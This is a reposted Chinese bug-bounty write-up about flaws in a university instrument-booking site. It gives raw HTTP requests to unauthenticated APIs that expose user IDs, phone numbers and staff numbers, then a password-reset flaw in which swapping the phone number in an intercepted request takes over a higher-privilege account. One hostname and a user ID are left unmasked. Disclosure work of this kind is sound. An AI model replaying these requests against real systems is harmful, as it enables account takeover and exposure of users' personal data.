记一次SRC证书站挖掘

admin
admin
admin
102367
文章
87
评论
2024年2月19日10:10:02评论6 views字数 2173阅读7分14秒阅读模式

某川大学

访问:http://******.edu.cn/

点击右侧“注册功能”:

记一次SRC证书站挖掘

测试者,注册成功的账号为:1378888****(手机号)密码:123456Aa!

记一次SRC证书站挖掘

经过研究发现,引起问题涉及两个重要参数利用,分别是:qty&Userld;首先,我们直接通过浏览器访问:

****.***.edu.cn/Api/Instrument/GetTypeRoot?

记一次SRC证书站挖掘

可以看到404,报错。但是通过BP,回显json数据正常

记一次SRC证书站挖掘

这些数据采集自:设备/仪器类型,赋予查询参数1D号等。

此处说明是在反映后续“qty”,利用的完整性:

GET /Api/Instrument/GetTypeRoot HTTP/1.1Host:****.***.edu.cn:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: application/json,text/javascript,/:q=0.01Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateOrigin: http://****.***.edu.cnDNT:1Connection: closeReferer: http://****.***.edu.cn/

接着:浏览器直接访问:****.***.edu.cn/api/sample/getSampleApplySumList?userid=&qty=1

记一次SRC证书站挖掘

与上情况相同,404;通过BP:

记一次SRC证书站挖掘

此处,引入的参数qty值范围,源自:****.***.edu.cn/Api/Instrument/GetTypeRoot?

通过返回包,不难看出,对UserTrueName,UserPhone,UserName(工学号)做了隐藏,但通过发现,

访问

/api/topic/getTopicsByUserld?pagelndex=1&pageSize=10&userId=6f475c-62154dd60484997386b04e可得到用户完整信息:

记一次SRC证书站挖掘
记一次SRC证书站挖掘

接下来就是逻辑漏洞

用户学工号,此判断来自:

记一次SRC证书站挖掘

记一次SRC证书站挖掘
记一次SRC证书站挖掘

手册中存在角色管理员:

记一次SRC证书站挖掘
记一次SRC证书站挖掘

BP进行访问:

记一次SRC证书站挖掘
GET /api/sample/getSampleApplySumList?userid=&qty=20 HTTP/1.1Host: ****.***.edu.cn:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept:/Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-Us;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateOrigin: http://****.***.edu.cnDNT: 1Connection: closeReferer: http://****.***.edu.cn/(http://vemc.scu.edu.cn/)提取返回包:userld=fe427c41-c3f6-4195-a873-1512e35ddce0
获取手机号和工学号:GET /api/topic/getTopicsByUserd?pagelndex=1&pageSize=10&userd=fe427c41-c3f6-4195-a873-1512e35ddce0 HTTP/1.1Host: ****.***.edu.cn:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: application/json,text/javascript,/:q=0.01Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;g=0.2Accept-Encoding: gzip, deflateOrigin: http://****.***.edu.cnNDT:1Connection: closeReferer:http://****.***.edu.cn/
记一次SRC证书站挖掘

访问:http://****.***.edu.cn/

此时,我们点击“忘记密码”:

记一次SRC证书站挖掘

使用自己刚注册好的手机号:1378888****(这里的角色是校外预约人员),获取验证码:

记一次SRC证书站挖掘

跳转到密码修改处:

记一次SRC证书站挖掘

这里打开BP,点击“确认修改”,拦截包:

注意将自己的手机号进行更替为:

记一次SRC证书站挖掘

可以看到修改成功:

记一次SRC证书站挖掘

接着,我们用开头关联手机号1772196****的工学号进行登录:20182420/12*****

记一次SRC证书站挖掘

对比上述PDF图:可看到,已越权至具有高权限的用户:

记一次SRC证书站挖掘
记一次SRC证书站挖掘

证明可以通过未授权访问userld,不断查找,越权用户,获取到最高系统管理员权限。

原文始发于微信公众号(PwnPigPig):记一次SRC证书站挖掘

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月19日10:10:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次SRC证书站挖掘https://cn-sec.com/archives/2504348.html

发表评论

匿名网友 填写信息